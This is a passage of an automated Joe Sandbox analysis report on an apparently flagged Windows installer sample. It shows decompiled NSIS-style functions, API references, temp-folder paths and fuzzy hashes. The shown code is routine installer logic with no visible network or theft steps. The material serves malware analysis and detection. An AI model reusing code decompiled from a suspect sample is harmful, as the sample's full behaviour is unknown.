                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: 568d9544259c005b986d8165ce0768b16a3a7432383eda321ab63cc9cb5825a7
                                                                        • Instruction ID: 4acd09ed437ca09ebf72ab30c2635bff24c4574a5ba86c548afdc27973a1ab81
                                                                        • Opcode Fuzzy Hash: 568d9544259c005b986d8165ce0768b16a3a7432383eda321ab63cc9cb5825a7
                                                                        • Instruction Fuzzy Hash: F051B332D00118AECB129FACC4846AD7FBBEB44358F116159D48FB3314E671AD96C7AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00401D81(void* __ebx, void* __edx) {
                                                                        				struct HWND__* _t30;
                                                                        				WCHAR* _t38;
                                                                        				void* _t48;
                                                                        				void* _t53;
                                                                        				signed int _t55;
                                                                        				signed int _t60;
                                                                        				long _t63;
                                                                        				void* _t65;
                                                                        
                                                                        				_t53 = __ebx;
                                                                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                        				} else {
                                                                        					E00402D84(2);
                                                                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                        				}
                                                                        				_t55 =  *(_t65 - 0x24);
                                                                        				 *(_t65 + 8) = _t30;
                                                                        				_t60 = _t55 & 0x00000004;
                                                                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                        				if((_t55 & 0x00010000) == 0) {
                                                                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                        				} else {
                                                                        					_t38 = E00402DA6(0x11);
                                                                        				}
                                                                        				 *(_t65 - 0x44) = _t38;
                                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                        				asm("sbb esi, esi");
                                                                        				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                        					DeleteObject(_t48);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                        					_push(_t63);
                                                                        					E004065AF();
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                        				return 0;
                                                                        			}











                                                                        0x00401d81
                                                                        0x00401d85
                                                                        0x00401d9a
                                                                        0x00401d87
                                                                        0x00401d89
                                                                        0x00401d8f
                                                                        0x00401d8f
                                                                        0x00401da0
                                                                        0x00401da3
                                                                        0x00401dad
                                                                        0x00401db0
                                                                        0x00401db8
                                                                        0x00401dc9
                                                                        0x00401dcc
                                                                        0x00401dd7
                                                                        0x00401dce
                                                                        0x00401dd0
                                                                        0x00401dd0
                                                                        0x00401ddb
                                                                        0x00401de5
                                                                        0x00401e0c
                                                                        0x00401e1b
                                                                        0x00401e29
                                                                        0x00401e31
                                                                        0x00401e39
                                                                        0x00401e39
                                                                        0x00401e42
                                                                        0x00401e48
                                                                        0x00402ba4
                                                                        0x00402ba4
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                        • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                        • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                        • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E00401E4E(intOrPtr __edx) {
                                                                        				void* __edi;
                                                                        				int _t9;
                                                                        				signed char _t15;
                                                                        				struct HFONT__* _t18;
                                                                        				intOrPtr _t30;
                                                                        				void* _t31;
                                                                        				struct HDC__* _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				_t30 = __edx;
                                                                        				_t33 = GetDC( *(_t35 - 8));
                                                                        				_t9 = E00402D84(2);
                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                        				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                        				ReleaseDC( *(_t35 - 8), _t33);
                                                                        				 *0x40ce08 = E00402D84(3);
                                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                        				 *0x40ce0f = 1;
                                                                        				 *0x40ce0c = _t15 & 0x00000001;
                                                                        				 *0x40ce0d = _t15 & 0x00000002;
                                                                        				 *0x40ce0e = _t15 & 0x00000004;
                                                                        				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                        				_t18 = CreateFontIndirectW(0x40cdf8);
                                                                        				_push(_t18);
                                                                        				_push(_t31);
                                                                        				E004065AF();
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                        				return 0;
                                                                        			}











                                                                        0x00401e4e
                                                                        0x00401e59
                                                                        0x00401e5b
                                                                        0x00401e68
                                                                        0x00401e7f
                                                                        0x00401e84
                                                                        0x00401e91
                                                                        0x00401e96
                                                                        0x00401e9a
                                                                        0x00401ea5
                                                                        0x00401eac
                                                                        0x00401ebe
                                                                        0x00401ec4
                                                                        0x00401ec9
                                                                        0x00401ed3
                                                                        0x00402638
                                                                        0x0040156d
                                                                        0x00402ba4
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                        • ReleaseDC.USER32 ref: 00401E84
                                                                          • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                          • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000), ref: 004068A4
                                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2584051700-0
                                                                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                        • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                        • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00405F37(WCHAR* _a4) {
                                                                        				WCHAR* _t9;
                                                                        
                                                                        				_t9 = _a4;
                                                                        				_push( &(_t9[lstrlenW(_t9)]));
                                                                        				_push(_t9);
                                                                        				if( *(CharPrevW()) != 0x5c) {
                                                                        					lstrcatW(_t9, 0x40a014);
                                                                        				}
                                                                        				return _t9;
                                                                        			}




                                                                        0x00405f38
                                                                        0x00405f45
                                                                        0x00405f46
                                                                        0x00405f51
                                                                        0x00405f59
                                                                        0x00405f59
                                                                        0x00405f61

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3936084776
                                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                        • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                        • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E724910E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                        				void* _v0;
                                                                        				void* _t27;
                                                                        				signed int _t29;
                                                                        				void* _t30;
                                                                        				void* _t34;
                                                                        				void* _t36;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t48;
                                                                        				void* _t54;
                                                                        				void* _t63;
                                                                        				void* _t64;
                                                                        				signed int _t66;
                                                                        				void* _t67;
                                                                        				void* _t73;
                                                                        				void* _t74;
                                                                        				void* _t77;
                                                                        				void* _t80;
                                                                        				void _t81;
                                                                        				void _t82;
                                                                        				intOrPtr _t84;
                                                                        				void* _t86;
                                                                        				void* _t88;
                                                                        
                                                                        				 *0x7249506c = _a8;
                                                                        				 *0x72495070 = _a16;
                                                                        				 *0x72495074 = _a12;
                                                                        				_a12( *0x72495048, E72491651, _t73);
                                                                        				_t66 =  *0x7249506c +  *0x7249506c * 4 << 3;
                                                                        				_t27 = E724912E3();
                                                                        				_v0 = _t27;
                                                                        				_t74 = _t27;
                                                                        				if( *_t27 == 0) {
                                                                        					L28:
                                                                        					return GlobalFree(_t27);
                                                                        				}
                                                                        				do {
                                                                        					_t29 =  *_t74 & 0x0000ffff;
                                                                        					_t67 = 2;
                                                                        					_t74 = _t74 + _t67;
                                                                        					_t88 = _t29 - 0x66;
                                                                        					if(_t88 > 0) {
                                                                        						_t30 = _t29 - 0x6c;
                                                                        						if(_t30 == 0) {
                                                                        							L23:
                                                                        							_t31 =  *0x72495040;
                                                                        							if( *0x72495040 == 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							E72491603( *0x72495074, _t31 + 4, _t66);
                                                                        							_t34 =  *0x72495040;
                                                                        							_t86 = _t86 + 0xc;
                                                                        							 *0x72495040 =  *_t34;
                                                                        							L25:
                                                                        							GlobalFree(_t34);
                                                                        							goto L26;
                                                                        						}
                                                                        						_t36 = _t30 - 4;
                                                                        						if(_t36 == 0) {
                                                                        							L13:
                                                                        							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                        							_t74 = _t74 + _t67;
                                                                        							_t34 = E72491312(E7249135A(_t38));
                                                                        							L14:
                                                                        							goto L25;
                                                                        						}
                                                                        						_t40 = _t36 - _t67;
                                                                        						if(_t40 == 0) {
                                                                        							L11:
                                                                        							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                        							_t74 = _t74 + _t67;
                                                                        							_t34 = E72491381(_t80, E724912E3());
                                                                        							goto L14;
                                                                        						}
                                                                        						L8:
                                                                        						if(_t40 == 1) {
                                                                        							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                        							_t10 = _t81 + 4; // 0x4
                                                                        							E72491603(_t10,  *0x72495074, _t66);
                                                                        							_t86 = _t86 + 0xc;
                                                                        							 *_t81 =  *0x72495040;
                                                                        							 *0x72495040 = _t81;
                                                                        						}
                                                                        						goto L26;
                                                                        					}
                                                                        					if(_t88 == 0) {
                                                                        						_t48 =  *0x72495070;
                                                                        						_t77 =  *_t48;
                                                                        						 *_t48 =  *_t77;
                                                                        						_t49 = _v0;
                                                                        						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                        						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                        							E72491603(_t49, _t77 + 8, 0x38);
                                                                        							_t86 = _t86 + 0xc;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                        						GlobalFree(_t77);
                                                                        						goto L26;
                                                                        					}
                                                                        					_t54 = _t29 - 0x46;
                                                                        					if(_t54 == 0) {
                                                                        						_t82 = GlobalAlloc(0x40,  *0x7249506c +  *0x7249506c + 8);
                                                                        						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                        						_t14 = _t82 + 8; // 0x8
                                                                        						E72491603(_t14, _v0, 0x38);
                                                                        						_t86 = _t86 + 0xc;
                                                                        						 *_t82 =  *( *0x72495070);
                                                                        						 *( *0x72495070) = _t82;
                                                                        						goto L26;
                                                                        					}
                                                                        					_t63 = _t54 - 6;
                                                                        					if(_t63 == 0) {
                                                                        						goto L23;
                                                                        					}
                                                                        					_t64 = _t63 - 4;
                                                                        					if(_t64 == 0) {
                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                        						goto L13;
                                                                        					}
                                                                        					_t40 = _t64 - _t67;
                                                                        					if(_t40 == 0) {
                                                                        						 *_t74 =  *_t74 + 0xa;
                                                                        						goto L11;
                                                                        					}
                                                                        					goto L8;
                                                                        					L26:
                                                                        				} while ( *_t74 != 0);
                                                                        				_t27 = _v0;
                                                                        				goto L28;
                                                                        			}


























                                                                        0x724910eb
                                                                        0x72491100
                                                                        0x72491109
                                                                        0x7249110e
                                                                        0x72491119
                                                                        0x7249111c
                                                                        0x72491125
                                                                        0x72491129
                                                                        0x7249112b
                                                                        0x724912b0
                                                                        0x724912ba
                                                                        0x724912ba
                                                                        0x72491132
                                                                        0x72491132
                                                                        0x72491137
                                                                        0x72491138
                                                                        0x7249113a
                                                                        0x7249113d
                                                                        0x72491256
                                                                        0x72491259
                                                                        0x72491271
                                                                        0x72491271
                                                                        0x72491278
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491285
                                                                        0x7249128a
                                                                        0x7249128f
                                                                        0x72491294
                                                                        0x7249129a
                                                                        0x7249129b
                                                                        0x00000000
                                                                        0x7249129b
                                                                        0x7249125b
                                                                        0x7249125e
                                                                        0x724911bc
                                                                        0x724911bf
                                                                        0x724911c2
                                                                        0x724911cb
                                                                        0x724911d0
                                                                        0x00000000
                                                                        0x724911d1
                                                                        0x72491264
                                                                        0x72491266
                                                                        0x724911a2
                                                                        0x724911a5
                                                                        0x724911a8
                                                                        0x724911b1
                                                                        0x00000000
                                                                        0x724911b1
                                                                        0x72491164
                                                                        0x72491165
                                                                        0x72491177
                                                                        0x72491180
                                                                        0x72491184
                                                                        0x7249118e
                                                                        0x72491191
                                                                        0x72491193
                                                                        0x72491193
                                                                        0x00000000
                                                                        0x72491165
                                                                        0x72491143
                                                                        0x72491218
                                                                        0x7249121d
                                                                        0x72491221
                                                                        0x72491223
                                                                        0x7249122c
                                                                        0x7249122f
                                                                        0x72491238
                                                                        0x7249123d
                                                                        0x7249123d
                                                                        0x72491247
                                                                        0x7249124a
                                                                        0x00000000
                                                                        0x72491250
                                                                        0x72491149
                                                                        0x7249114c
                                                                        0x724911e9
                                                                        0x724911ed
                                                                        0x724911f7
                                                                        0x724911fb
                                                                        0x72491205
                                                                        0x7249120a
                                                                        0x72491211
                                                                        0x00000000
                                                                        0x72491211
                                                                        0x72491152
                                                                        0x72491155
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x7249115b
                                                                        0x7249115e
                                                                        0x724911b8
                                                                        0x00000000
                                                                        0x724911b8
                                                                        0x72491160
                                                                        0x72491162
                                                                        0x7249119e
                                                                        0x00000000
                                                                        0x7249119e
                                                                        0x00000000
                                                                        0x724912a1
                                                                        0x724912a1
                                                                        0x724912ab
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 1780285237-0
                                                                        • Opcode ID: 21ec97b3231335bb38045a8db408ab2aaaaf952f49760bebe9b741624d56a395
                                                                        • Instruction ID: d019b2bff97c6a17284a429fdbb327c80f2fede4881e39530b536ae485936622
                                                                        • Opcode Fuzzy Hash: 21ec97b3231335bb38045a8db408ab2aaaaf952f49760bebe9b741624d56a395
                                                                        • Instruction Fuzzy Hash: 23518BB6940201DFD7059F6DC844B257FB8EB58719B20591EE9CAFB250E730A911CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                        				signed int _t14;
                                                                        				int _t17;
                                                                        				void* _t24;
                                                                        				intOrPtr* _t29;
                                                                        				void* _t31;
                                                                        				signed int _t32;
                                                                        				void* _t35;
                                                                        				void* _t40;
                                                                        				signed int _t42;
                                                                        
                                                                        				_t29 = __edi;
                                                                        				_t24 = __ebx;
                                                                        				_t14 =  *(_t35 - 0x28);
                                                                        				_t40 = __edx - 0x38;
                                                                        				 *(_t35 - 0x10) = _t14;
                                                                        				_t27 = 0 | _t40 == 0x00000000;
                                                                        				_t32 = _t40 == 0;
                                                                        				if(_t14 == __ebx) {
                                                                        					if(__edx != 0x38) {
                                                                        						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                        					} else {
                                                                        						E00402DA6(0x21);
                                                                        						E0040668A("C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp", "C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp\System.dll", 0x400);
                                                                        						_t17 = lstrlenA("C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp\System.dll");
                                                                        					}
                                                                        				} else {
                                                                        					E00402D84(1);
                                                                        					 *0x40adf8 = __ax;
                                                                        					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                        				}
                                                                        				 *(_t35 + 8) = _t17;
                                                                        				if( *_t29 == _t24) {
                                                                        					L13:
                                                                        					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                        				} else {
                                                                        					_t31 = E004065C8(_t27, _t29);
                                                                        					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                                                        						_t14 = E0040620A(_t31, "C:\Users\engineer\AppData\Local\Temp\nsyEAEC.tmp\System.dll",  *(_t35 + 8));
                                                                        						_t42 = _t14;
                                                                        						if(_t42 == 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        					} else {
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                        				return 0;
                                                                        			}












                                                                        0x0040263e
                                                                        0x0040263e
                                                                        0x0040263e
                                                                        0x00402643
                                                                        0x00402646
                                                                        0x00402649
                                                                        0x0040264e
                                                                        0x00402650
                                                                        0x00402670
                                                                        0x004026aa
                                                                        0x00402672
                                                                        0x00402674
                                                                        0x00402688
                                                                        0x00402695
                                                                        0x00402695
                                                                        0x00402652
                                                                        0x00402654
                                                                        0x00402659
                                                                        0x00402667
                                                                        0x0040266a
                                                                        0x004026af
                                                                        0x004026b2
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x004026b8
                                                                        0x004026c1
                                                                        0x004026c3
                                                                        0x004026e2
                                                                        0x004015b4
                                                                        0x004015b6
                                                                        0x00000000
                                                                        0x004015bc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004026c3
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00402695
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp$C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll
                                                                        • API String ID: 1659193697-1378699162
                                                                        • Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                                        • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                        • Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                                        • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00403C25() {
                                                                        				void* _t1;
                                                                        				void* _t2;
                                                                        				signed int _t11;
                                                                        
                                                                        				_t1 =  *0x40a018; // 0x2bc
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					CloseHandle(_t1);
                                                                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                        				}
                                                                        				_t2 =  *0x40a01c; // 0x2c0
                                                                        				if(_t2 != 0xffffffff) {
                                                                        					CloseHandle(_t2);
                                                                        					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                        					_t11 =  *0x40a01c;
                                                                        				}
                                                                        				E00403C82();
                                                                        				return E00405D74(_t11, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\nsyEAEC.tmp", 7);
                                                                        			}






                                                                        0x00403c25
                                                                        0x00403c34
                                                                        0x00403c37
                                                                        0x00403c39
                                                                        0x00403c39
                                                                        0x00403c40
                                                                        0x00403c48
                                                                        0x00403c4b
                                                                        0x00403c4d
                                                                        0x00403c4d
                                                                        0x00403c4d
                                                                        0x00403c54
                                                                        0x00403c66

                                                                        APIs
                                                                        • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                        • CloseHandle.KERNEL32(000002C0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                        • C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp, xrefs: 00403C5B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
